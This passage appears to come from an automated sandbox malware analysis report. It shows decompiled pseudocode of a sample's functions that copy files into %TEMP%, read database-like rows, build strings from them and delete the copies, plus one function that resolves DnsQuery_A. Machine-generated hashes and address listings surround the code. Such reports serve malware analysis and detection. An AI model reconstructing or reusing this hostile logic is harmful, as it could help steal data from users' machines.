								_t181 =  *0x41b588; // 0x41c794
								_t183 =  *((intOrPtr*)( *_t181))(_v20, 2, 0x4111b0, _v88);
								_t232 = _t232 + 0x28;
								E00403C98( &_v92, _t183);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t187 =  *0x41b584; // 0x41b0b4
								 *_t187 =  *_t187 + 1;
								__eflags =  *_t187;
							}
						}
					}
					L10:
					_t109 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t109))(_v20);
					_t113 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t113))(_v16);
					_pop(_t211);
					 *[fs:eax] = _t211;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t225);
					 *[fs:eax] = _t225;
				}
				_pop(_t213);
				 *[fs:eax] = _t213;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}





















































                                                                      0x00410e68
                                                                      0x00410e68
                                                                      0x00410e68
                                                                      0x00410e6d
                                                                      0x00410e6f
                                                                      0x00410e71
                                                                      0x00410e73
                                                                      0x00410e78
                                                                      0x00410e78
                                                                      0x00410e7a
                                                                      0x00410e7c
                                                                      0x00410e7c
                                                                      0x00410e7c
                                                                      0x00410e7f
                                                                      0x00410e80
                                                                      0x00410e81
                                                                      0x00410e82
                                                                      0x00410e85
                                                                      0x00410e8b
                                                                      0x00410e92
                                                                      0x00410e93
                                                                      0x00410e98
                                                                      0x00410e9b
                                                                      0x00410ea1
                                                                      0x00410ea8
                                                                      0x00410ea9
                                                                      0x00410eae
                                                                      0x00410eb1
                                                                      0x00410ebc
                                                                      0x00410ec1
                                                                      0x00410ec7
                                                                      0x00410ecc
                                                                      0x00410ecf
                                                                      0x00410edc
                                                                      0x00410ee7
                                                                      0x00410ef4
                                                                      0x00410ef9
                                                                      0x00410efc
                                                                      0x00410f01
                                                                      0x00410f0c
                                                                      0x00410f17
                                                                      0x00410f21
                                                                      0x00410f30
                                                                      0x00410f3b
                                                                      0x00410f46
                                                                      0x00410f51
                                                                      0x00410f60
                                                                      0x00410f7c
                                                                      0x00410f83
                                                                      0x00410f85
                                                                      0x00410f88
                                                                      0x00410f8a
                                                                      0x00410fa2
                                                                      0x00410fb4
                                                                      0x00410fbb
                                                                      0x00410fbd
                                                                      0x00410fc0
                                                                      0x00410fc2
                                                                      0x00411091
                                                                      0x00411095
                                                                      0x0041109c
                                                                      0x0041109f
                                                                      0x004110a2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00410fd3
                                                                      0x00410fe6
                                                                      0x00410fed
                                                                      0x00410ff5
                                                                      0x00410ff6
                                                                      0x00411004
                                                                      0x00411017
                                                                      0x00411028
                                                                      0x0041103b
                                                                      0x0041104c
                                                                      0x0041105f
                                                                      0x00411066
                                                                      0x00411068
                                                                      0x00411070
                                                                      0x00411075
                                                                      0x00411078
                                                                      0x00411085
                                                                      0x0041108a
                                                                      0x0041108f
                                                                      0x0041108f
                                                                      0x0041108f
                                                                      0x00411091
                                                                      0x00410fc2
                                                                      0x004110a8
                                                                      0x004110ac
                                                                      0x004110b3
                                                                      0x004110ba
                                                                      0x004110c1
                                                                      0x004110c6
                                                                      0x004110c9
                                                                      0x004110de
                                                                      0x004110ec
                                                                      0x00410f62
                                                                      0x00410f64
                                                                      0x00410f67
                                                                      0x00410f67
                                                                      0x004110f3
                                                                      0x004110f6
                                                                      0x004110f9
                                                                      0x00411106
                                                                      0x0041110e
                                                                      0x00411116
                                                                      0x0041111e
                                                                      0x0041112b
                                                                      0x00411133
                                                                      0x00411140
                                                                      0x00411148
                                                                      0x00411155
                                                                      0x00411162

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00410EB4
                                                                      • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CopyCountFileTick
                                                                      • String ID: %TEMP%$.tmp
                                                                      • API String ID: 3448371392-3650661790
                                                                      • Opcode ID: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
                                                                      • Instruction ID: 3bd2312418c75e2bfd4f88111c3886d823680ea6e83d1d6075c9c2a9f0993f15
                                                                      • Opcode Fuzzy Hash: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
                                                                      • Instruction Fuzzy Hash: 4241013190410DAEDB01FFA1D842ADDBBB9EF49318F50447BF500B36A2D77DAE458A58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00410BB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 47%
                                                                      			E00410BB0(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				signed int _t57;
				signed int _t58;
				WCHAR* _t78;
				intOrPtr* _t93;
				void* _t95;
				intOrPtr* _t97;
				intOrPtr* _t101;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr* _t138;
				void* _t140;
				intOrPtr* _t142;
				intOrPtr* _t148;
				void* _t150;
				void* _t156;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t186;
				intOrPtr _t190;
				intOrPtr _t191;
				void* _t192;
				void* _t193;

				_t188 = __esi;
				_t155 = __ebx;
				_t57 = __eax +  *__eax;
				 *_t57 =  *_t57 + _t57;
				_t58 = _t57 | 0x5500000a;
				_t190 = _t191;
				_t156 = 9;
				do {
					_push(0);
					_push(0);
					_t156 = _t156 - 1;
					_t197 = _t156;
				} while (_t156 != 0);
				_push(_t156);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t58;
				E004040F4( &_v8);
				_push(_t190);
				_push(0x410e20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				E00403B80( &_v28);
				_push(_t190);
				_push(0x410da0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t197);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t197);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t155,  &_v40, _t197);
				E004062D8(L"%TEMP%",  &_v60, _t197);
				_push(_v60);
				_push(E00410E58);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t155,  &_v44, _t197);
				_t78 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t78, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t155, _t156,  &_v36, _t188, _t197);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t155, _t156) != 0) {
					_t93 =  *0x41b55c; // 0x41c784
					_t95 =  *((intOrPtr*)( *_t93))(E00403990(_v36),  &_v16);
					_t192 = _t191 + 8;
					__eflags = _t95;
					if(_t95 == 0) {
						E00408120(0x65,  &_v72);
						_t134 =  *0x41b5cc; // 0x41c78c
						_t136 =  *((intOrPtr*)( *_t134))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t193 = _t192 + 0x14;
						__eflags = _t136;
						if(_t136 == 0) {
							while(1) {
								_t138 =  *0x41b600; // 0x41c790
								_t140 =  *((intOrPtr*)( *_t138))(_v20);
								__eflags = _t140 - 0x64;
								if(_t140 != 0x64) {
									goto L11;
								}
								_t142 =  *0x41b588; // 0x41c794
								E00403C98( &_v76,  *((intOrPtr*)( *_t142))(_v20, 0, _v28));
								_t148 =  *0x41b588; // 0x41c794
								_t150 =  *((intOrPtr*)( *_t148))(_v20, 1, E00410E60, _v76);
								_t193 = _t193 + 0x10;
								E00403C98( &_v80, _t150);
								_push(_v80);
								_push(E00410E68);
								E00403E1C();
							}
						}
					}
					L11:
					_t97 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t97))(_v20);
					_t101 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t101))(_v16);
					_pop(_t176);
					 *[fs:eax] = _t176;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t186);
					 *[fs:eax] = _t186;
				}
				_pop(_t178);
				 *[fs:eax] = _t178;
				_push(E00410E27);
				E00403B98( &_v80, 2);
				E004034E4( &_v72);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}












































                                                                      0x00410bb0
                                                                      0x00410bb0
                                                                      0x00410bb0
                                                                      0x00410bb2
                                                                      0x00410bb4
                                                                      0x00410bb9
                                                                      0x00410bbb
                                                                      0x00410bc0
                                                                      0x00410bc0
                                                                      0x00410bc2
                                                                      0x00410bc4
                                                                      0x00410bc4
                                                                      0x00410bc4
                                                                      0x00410bc7
                                                                      0x00410bc8
                                                                      0x00410bc9
                                                                      0x00410bca
                                                                      0x00410bcb
                                                                      0x00410bce
                                                                      0x00410bd4
                                                                      0x00410bdb
                                                                      0x00410bdc
                                                                      0x00410be1
                                                                      0x00410be4
                                                                      0x00410bea
                                                                      0x00410bf1
                                                                      0x00410bf2
                                                                      0x00410bf7
                                                                      0x00410bfa
                                                                      0x00410c05
                                                                      0x00410c0a
                                                                      0x00410c10
                                                                      0x00410c15
                                                                      0x00410c18
                                                                      0x00410c25
                                                                      0x00410c30
                                                                      0x00410c3d
                                                                      0x00410c42
                                                                      0x00410c45
                                                                      0x00410c4a
                                                                      0x00410c55
                                                                      0x00410c60
                                                                      0x00410c6a
                                                                      0x00410c79
                                                                      0x00410c84
                                                                      0x00410c8f
                                                                      0x00410c9a
                                                                      0x00410ca9
                                                                      0x00410cc5
                                                                      0x00410ccc
                                                                      0x00410cce
                                                                      0x00410cd1
                                                                      0x00410cd3
                                                                      0x00410ceb
                                                                      0x00410cfd
                                                                      0x00410d04
                                                                      0x00410d06
                                                                      0x00410d09
                                                                      0x00410d0b
                                                                      0x00410d67
                                                                      0x00410d6b
                                                                      0x00410d72
                                                                      0x00410d75
                                                                      0x00410d78
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00410d18
                                                                      0x00410d29
                                                                      0x00410d3c
                                                                      0x00410d43
                                                                      0x00410d45
                                                                      0x00410d4d
                                                                      0x00410d52
                                                                      0x00410d55
                                                                      0x00410d62
                                                                      0x00410d62
                                                                      0x00410d67
                                                                      0x00410d0b
                                                                      0x00410d7a
                                                                      0x00410d7e
                                                                      0x00410d85
                                                                      0x00410d8c
                                                                      0x00410d93
                                                                      0x00410d98
                                                                      0x00410d9b
                                                                      0x00410db0
                                                                      0x00410dbe
                                                                      0x00410cab
                                                                      0x00410cad
                                                                      0x00410cb0
                                                                      0x00410cb0
                                                                      0x00410dc5
                                                                      0x00410dc8
                                                                      0x00410dcb
                                                                      0x00410dd8
                                                                      0x00410de0
                                                                      0x00410de8
                                                                      0x00410df0
                                                                      0x00410dfd
                                                                      0x00410e05
                                                                      0x00410e12
                                                                      0x00410e1f

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00410BFD
                                                                      • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CopyCountFileTick
                                                                      • String ID: %TEMP%$.tmp
                                                                      • API String ID: 3448371392-3650661790
                                                                      • Opcode ID: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
                                                                      • Instruction ID: ad1686550c7843c0884c0506788be05dc1fde737249d1bd281ecbc27d8194f8d
                                                                      • Opcode Fuzzy Hash: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
                                                                      • Instruction Fuzzy Hash: BF412330914109AEDB01FF91D952ADDBBBDEF49318F50447BF400B7292D77CAE458A58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00410BB4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 46%
                                                                      			E00410BB4(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				signed int _t57;
				WCHAR* _t77;
				intOrPtr* _t92;
				void* _t94;
				intOrPtr* _t96;
				intOrPtr* _t100;
				intOrPtr* _t133;
				void* _t135;
				intOrPtr* _t137;
				void* _t139;
				intOrPtr* _t141;
				intOrPtr* _t147;
				void* _t149;
				void* _t155;
				intOrPtr _t175;
				intOrPtr _t177;
				intOrPtr _t185;
				intOrPtr _t189;
				intOrPtr _t190;
				void* _t191;
				void* _t192;

				_t187 = __esi;
				_t154 = __ebx;
				_t57 = __eax | 0x5500000a;
				_t189 = _t190;
				_t155 = 9;
				do {
					_push(0);
					_push(0);
					_t155 = _t155 - 1;
					_t195 = _t155;
				} while (_t155 != 0);
				_push(_t155);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t57;
				E004040F4( &_v8);
				_push(_t189);
				_push(0x410e20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				E00403B80( &_v28);
				_push(_t189);
				_push(0x410da0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t195);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t195);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t154,  &_v40, _t195);
				E004062D8(L"%TEMP%",  &_v60, _t195);
				_push(_v60);
				_push(E00410E58);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t154,  &_v44, _t195);
				_t77 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t77, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t154, _t155,  &_v36, _t187, _t195);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t154, _t155) != 0) {
					_t92 =  *0x41b55c; // 0x41c784
					_t94 =  *((intOrPtr*)( *_t92))(E00403990(_v36),  &_v16);
					_t191 = _t190 + 8;
					__eflags = _t94;
					if(_t94 == 0) {
						E00408120(0x65,  &_v72);
						_t133 =  *0x41b5cc; // 0x41c78c
						_t135 =  *((intOrPtr*)( *_t133))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t192 = _t191 + 0x14;
						__eflags = _t135;
						if(_t135 == 0) {
							while(1) {
								_t137 =  *0x41b600; // 0x41c790
								_t139 =  *((intOrPtr*)( *_t137))(_v20);
								__eflags = _t139 - 0x64;
								if(_t139 != 0x64) {
									goto L10;
								}
								_t141 =  *0x41b588; // 0x41c794
								E00403C98( &_v76,  *((intOrPtr*)( *_t141))(_v20, 0, _v28));
								_t147 =  *0x41b588; // 0x41c794
								_t149 =  *((intOrPtr*)( *_t147))(_v20, 1, E00410E60, _v76);
								_t192 = _t192 + 0x10;
								E00403C98( &_v80, _t149);
								_push(_v80);
								_push(E00410E68);
								E00403E1C();
							}
						}
					}
					L10:
					_t96 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t96))(_v20);
					_t100 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t100))(_v16);
					_pop(_t175);
					 *[fs:eax] = _t175;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t185);
					 *[fs:eax] = _t185;
				}
				_pop(_t177);
				 *[fs:eax] = _t177;
				_push(E00410E27);
				E00403B98( &_v80, 2);
				E004034E4( &_v72);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}











































                                                                      0x00410bb4
                                                                      0x00410bb4
                                                                      0x00410bb4
                                                                      0x00410bb9
                                                                      0x00410bbb
                                                                      0x00410bc0
                                                                      0x00410bc0
                                                                      0x00410bc2
                                                                      0x00410bc4
                                                                      0x00410bc4
                                                                      0x00410bc4
                                                                      0x00410bc7
                                                                      0x00410bc8
                                                                      0x00410bc9
                                                                      0x00410bca
                                                                      0x00410bcb
                                                                      0x00410bce
                                                                      0x00410bd4
                                                                      0x00410bdb
                                                                      0x00410bdc
                                                                      0x00410be1
                                                                      0x00410be4
                                                                      0x00410bea
                                                                      0x00410bf1
                                                                      0x00410bf2
                                                                      0x00410bf7
                                                                      0x00410bfa
                                                                      0x00410c05
                                                                      0x00410c0a
                                                                      0x00410c10
                                                                      0x00410c15
                                                                      0x00410c18
                                                                      0x00410c25
                                                                      0x00410c30
                                                                      0x00410c3d
                                                                      0x00410c42
                                                                      0x00410c45
                                                                      0x00410c4a
                                                                      0x00410c55
                                                                      0x00410c60
                                                                      0x00410c6a
                                                                      0x00410c79
                                                                      0x00410c84
                                                                      0x00410c8f
                                                                      0x00410c9a
                                                                      0x00410ca9
                                                                      0x00410cc5
                                                                      0x00410ccc
                                                                      0x00410cce
                                                                      0x00410cd1
                                                                      0x00410cd3
                                                                      0x00410ceb
                                                                      0x00410cfd
                                                                      0x00410d04
                                                                      0x00410d06
                                                                      0x00410d09
                                                                      0x00410d0b
                                                                      0x00410d67
                                                                      0x00410d6b
                                                                      0x00410d72
                                                                      0x00410d75
                                                                      0x00410d78
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00410d18
                                                                      0x00410d29
                                                                      0x00410d3c
                                                                      0x00410d43
                                                                      0x00410d45
                                                                      0x00410d4d
                                                                      0x00410d52
                                                                      0x00410d55
                                                                      0x00410d62
                                                                      0x00410d62
                                                                      0x00410d67
                                                                      0x00410d0b
                                                                      0x00410d7a
                                                                      0x00410d7e
                                                                      0x00410d85
                                                                      0x00410d8c
                                                                      0x00410d93
                                                                      0x00410d98
                                                                      0x00410d9b
                                                                      0x00410db0
                                                                      0x00410dbe
                                                                      0x00410cab
                                                                      0x00410cad
                                                                      0x00410cb0
                                                                      0x00410cb0
                                                                      0x00410dc5
                                                                      0x00410dc8
                                                                      0x00410dcb
                                                                      0x00410dd8
                                                                      0x00410de0
                                                                      0x00410de8
                                                                      0x00410df0
                                                                      0x00410dfd
                                                                      0x00410e05
                                                                      0x00410e12
                                                                      0x00410e1f

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00410BFD
                                                                      • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CopyCountFileTick
                                                                      • String ID: %TEMP%$.tmp
                                                                      • API String ID: 3448371392-3650661790
                                                                      • Opcode ID: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
                                                                      • Instruction ID: ab4a798e1dfa23648b03a2b2561a2af29de01fabf162149de749457abe37d48b
                                                                      • Opcode Fuzzy Hash: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
                                                                      • Instruction Fuzzy Hash: 37411331910109AEDB01FF92D952ADDBBBDEF48318F50447BF400B3292D77DAE458A58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040DDB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 69%
                                                                      			E0040DDB0(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t29;
				void* _t40;
				WCHAR* _t51;
				int _t54;
				void* _t59;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t73;
				void* _t74;
				intOrPtr _t77;
				void* _t78;
				void* _t79;

				_t74 = __esi;
				_t73 = __edi;
				_t63 = __edx;
				_t59 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E00403980(_v12);
				_push(_t77);
				_push(0x40deaf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t77;
				_t29 = E00403790(_v16);
				asm("cdq");
				_t78 = _t63 -  *0x41c82c; // 0x0
				if(_t78 != 0) {
					if(__eflags < 0) {
						goto L4;
					}
				} else {
					_t79 = _t29 -  *0x41c828; // 0x5000000
					if(_t79 < 0) {
						L4:
						E00407168(_v8, _t59,  &_v16);
						_t40 = E00403790(_v16);
						_t80 = _t40;
						if(_t40 == 0) {
							_t9 =  &_v20; // 0x414c4c
							E004062D8(L"%TEMP%\\curbuf.dat", _t9, _t80);
							_t10 =  &_v20; // 0x414c4c
							_t51 = E00403D3C( *_t10);
							_t54 = CopyFileW(E00403D3C(_v8), _t51, 0);
							_t81 = _t54;
							if(_t54 != 0) {
								E004062D8(L"%TEMP%\\curbuf.dat",  &_v24, _t81);
								E00407168(_v24, _t59,  &_v16);
							}
						}
						E0040DCE8(_v16, _t59, _v12, _t73, _t74);
						E004062D8(L"%TEMP%\\curbuf.dat",  &_v28, _t81);
						DeleteFileW(E00403D3C(_v28));
					}
				}
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(E0040DEB6);
				E00403B98( &_v28, 3);
				E00403508( &_v16, 2);
				return E00403B80( &_v8);
			}





















                                                                      0x0040ddb0
                                                                      0x0040ddb0
                                                                      0x0040ddb0
                                                                      0x0040ddb0
                                                                      0x0040ddb5
                                                                      0x0040ddb6
                                                                      0x0040ddb7
                                                                      0x0040ddb8
                                                                      0x0040ddb9
                                                                      0x0040ddba
                                                                      0x0040ddbb
                                                                      0x0040ddbe
                                                                      0x0040ddc4
                                                                      0x0040ddcc
                                                                      0x0040ddd3
                                                                      0x0040ddd4
                                                                      0x0040ddd9
                                                                      0x0040dddc
                                                                      0x0040dde2
                                                                      0x0040dde7
                                                                      0x0040dde8
                                                                      0x0040ddee
                                                                      0x0040ddfe
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040ddf0
                                                                      0x0040ddf0
                                                                      0x0040ddf6
                                                                      0x0040de00
                                                                      0x0040de06
                                                                      0x0040de0e
                                                                      0x0040de13
                                                                      0x0040de15
                                                                      0x0040de19
                                                                      0x0040de21
                                                                      0x0040de26
                                                                      0x0040de29
                                                                      0x0040de38
                                                                      0x0040de3d
                                                                      0x0040de3f
                                                                      0x0040de49
                                                                      0x0040de54
                                                                      0x0040de54
                                                                      0x0040de3f
                                                                      0x0040de5f
                                                                      0x0040de6c
                                                                      0x0040de7a
                                                                      0x0040de7a
                                                                      0x0040ddf6
                                                                      0x0040de81
                                                                      0x0040de84
                                                                      0x0040de87
                                                                      0x0040de94
                                                                      0x0040dea1
                                                                      0x0040deae

                                                                      APIs
                                                                        • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                      • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C), ref: 0040DE38
                                                                      • DeleteFileW.KERNEL32(00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C,00000001,?), ref: 0040DE7A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$AllocCopyDeleteString
                                                                      • String ID: %TEMP%\curbuf.dat$LLA
                                                                      • API String ID: 5292005-3909751444
                                                                      • Opcode ID: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
                                                                      • Instruction ID: d3139e3bb668dcd489f787ebceafddff3eb8ed9e6fe86914fc70b8a9fa006da4
                                                                      • Opcode Fuzzy Hash: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
                                                                      • Instruction Fuzzy Hash: 3E21FC74D10509ABDB00FBE5C88299EB7B9AF54305F50857BF400B72D2D738AE058A99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00417E78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 36%
                                                                      			E00417E78(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v117;
				void* _t16;
				intOrPtr* _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t49;

				_t16 = __eax +  *__eax;
				 *_t16 =  *_t16 + _t16;
				 *[cs:eax] =  *[cs:eax] + _t16;
				_v117 = _v117 + __edx;
				_v12 = __edx;
				_v8 = _t16;
				E00403980(_v8);
				_push(_t49);
				_push(0x417f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49 + 0xfffffff4;
				_t46 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t46 != 0) {
					_v16 = 0;
					_t37 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t37 = 1;
					 *((intOrPtr*)(_t37 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t37);
					_push(0);
					_push(1);
					_push(E00403990(_v8));
					if( *_t46() == 0) {
					}
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E00417F29);
				return E004034E4( &_v8);
			}












                                                                      0x00417e78
                                                                      0x00417e7a
                                                                      0x00417e7c
                                                                      0x00417e7f
                                                                      0x00417e89
                                                                      0x00417e8c
                                                                      0x00417e92
                                                                      0x00417e99
                                                                      0x00417e9a
                                                                      0x00417e9f
                                                                      0x00417ea2
                                                                      0x00417ebc
                                                                      0x00417ec0
                                                                      0x00417ec4
                                                                      0x00417ed1
                                                                      0x00417edd
                                                                      0x00417ee0
                                                                      0x00417ee9
                                                                      0x00417eec
                                                                      0x00417ef1
                                                                      0x00417ef2
                                                                      0x00417ef3
                                                                      0x00417ef5
                                                                      0x00417eff
                                                                      0x00417f04
                                                                      0x00417f04
                                                                      0x00417f04
                                                                      0x00417f0e
                                                                      0x00417f11
                                                                      0x00417f14
                                                                      0x00417f21

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                      • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: DnsQuery_A$dnsapi.dll
                                                                      • API String ID: 2574300362-3847274415
                                                                      • Opcode ID: 7cb15cb3270dfea7a69dcce4b2cbc269a71cea9dcfa89aa6ef7ea401378252cb
                                                                      • Instruction ID: ee02e28701cd333fe80aa916ff0e932040e536dc5bff3800914b034e455f76c5
                                                                      • Opcode Fuzzy Hash: 7cb15cb3270dfea7a69dcce4b2cbc269a71cea9dcfa89aa6ef7ea401378252cb
                                                                      • Instruction Fuzzy Hash: A9115E71A08304AED711DBA9CC52B9EBBB8DB45704F5140A7E504E72D2D6789E018B58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00417E7C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59libraryloaderCOMMON
                                                                      Download Yara Rule
